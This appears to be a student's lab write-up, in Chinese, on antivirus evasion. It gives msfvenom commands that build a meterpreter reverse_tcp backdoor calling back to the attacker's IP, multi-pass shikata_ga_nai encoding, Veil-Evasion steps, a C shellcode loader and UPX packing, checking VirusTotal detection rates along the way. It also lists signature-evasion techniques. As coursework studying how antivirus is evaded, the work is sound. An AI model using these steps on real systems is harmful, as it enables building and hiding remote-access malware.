20155327李百乾 Exp3 免殺原理與實踐

#20155327李百乾 Exp3 免殺原理與實踐

##實踐guocheng ###一.Msfvenom使用編碼器 1.利用(virustota)[https://www.virustotal.com/]檢測實驗二的後門程序 可見未經處理的後門程序被大多數軟件識別出來。 2.用msf編碼器對後門程序進行一次到屢次的編碼，看看是否對免殺有所做用。 十次編碼使用命令：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.161.134 LPORT=443 -f exe > met-encoded10.exe

3.將編碼十次後的可執行文件上傳到VirusTotal掃描

可見通常來講AV廠商會針對其使用的模板來生成特徵碼，這樣就一勞永逸地解決全部msfvenom生成的惡意代碼了。

###二.Veil-Evasion 1.安裝好veil後，首先要啓用veil

• 輸入命令：veil； -接着進入veil-evasion，在veil中輸入命令：use evasion
• 輸入命令：use c/meterpreter/rev_tcp.py用c語言重寫meterperter
• 設置反彈鏈接IP，命令爲：set LHOST 192.168.161.134，注意此處的IP是KaliIP；
• 設置端口，命令爲：set LPORT 5327
• 輸入generate生成文件，接着輸入playload的名字：playload5327
• 最後出現 2.將文件進行掃描 能夠發現報毒率降低了不少 ###三. C語言調用Shellcode 1.首先使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.161.134 LPORT=5327 -f c用c語言生成一段shellcode; 2.建立20155312.c，而後將unsigned char buf[]賦值到其中，代碼最後加上

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

3.使用命令：i686-w64-mingw32-g++ 20155327.c -o 20155327.exe編譯這個.c文件爲可執行文件：意思是將該文件編譯爲一個可在64位windows系統下操做的可執行文件。 4.將文件進行掃描

###四.加殼 1.用下面的命令來加這個壓縮殼

upx 20155327.exe -o 20155327a.exe

2.進行檢測

##實驗小結 ###基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

• 基於特徵碼的檢測

• 啓發式惡意軟件檢測

• 基於行爲的惡意軟件檢測 （2）免殺是作什麼？

使病毒木馬免於被殺毒軟件查殺，使攻擊機安全利用 （3）免殺的基本方法有哪些？

• 加殼改殼：加殼改殼是病毒免殺經常使用的手段之一，加殼改殼原理是將一個木馬文件加上upx殼或者其它殼後用lordpe將文件入口點加1，而後將區段字符所有去掉，而後用od打開免殺的木馬在入口上下100字符內修改一些代碼讓殺毒軟件查不出來是什麼殼就不知道怎麼脫就能夠實現免殺的目的。

• 加花指令：加花是病毒免殺經常使用的手段，加花的原理就是經過添加加花指令（一些垃圾指令，類型加1減1之類的無用語句）讓殺毒軟件檢測不到特徵碼，干擾殺毒軟件正常的檢測。

• 改程序入口點

• 免殺修改方法：直接修改特徵碼的十六進制法、修改字符串大小寫法、等價替換法、指令順序調換法、通用跳轉法。 ###實驗總結 本次是第三次實驗，實驗過程當中仍是碰見了很多問題，也感覺到不能單單依賴於殺軟的保護，在平時生活中也要注意保護好本身的隱私。